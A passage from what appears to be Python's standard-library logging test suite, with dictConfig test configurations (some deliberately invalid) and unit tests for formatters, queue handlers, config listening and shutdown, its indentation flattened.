'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
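    # config9 sets both the handler and the compiler.parser logger to WARNING.
    # config9a and config9b are incremental updates ('incremental': True) which
    # only adjust the levels of existing objects: 9a lowers the logger threshold
    # to INFO while the handler stays at WARNING, and 9b then lowers the handler
    # to INFO as well.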
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
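    # The 'filt1' entry becomes a plain logging.Filter(name='compiler.parser'),
    # which only passes records logged on 'compiler.parser' or its descendants.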
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
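    # A 'cfg://path' value is resolved by looking 'path' up inside this same
    # configuration dict, so 'cfg://handler_configs[hand1]' reuses that entry.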
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
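    # out_of_order gives the MemoryHandler 'bufferGlobal' a 'target' that is the
    # *name* of another handler; dictConfig must resolve that name to the actual
    # handler object even though handlers may be configured in arbitrary order.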
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    #Same as test_config7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
            #Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
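        # getChild('x.y') is shorthand for logging.getLogger() with the parent's
        # name prefixed; for the root logger only the suffix is used.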
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
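        # QueueHandler does not emit records itself: it prepares each record
        # (message merged into msg, args and exc_info cleared) and puts it on
        # the queue for something like a QueueListener to dispatch.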
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
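        # string.Template rules apply: '$$' is a literal '$', while '$name' and
        # '${name}' are substitutions.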
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
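        # logging.lastResort is a WARNING-level handler writing to sys.stderr;
        # it is used when a record propagates to the root of the hierarchy
        # without any handler being found.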
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.debug('This should not appear')
self.assertEqual(sio.getvalue(), '')
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
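        # shutdown() walks the handler list in reverse order, calling acquire(),
        # flush(), close() and release() on each handler that is still alive,
        # which is the order asserted below.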
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', IOError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', IOError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', IOError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
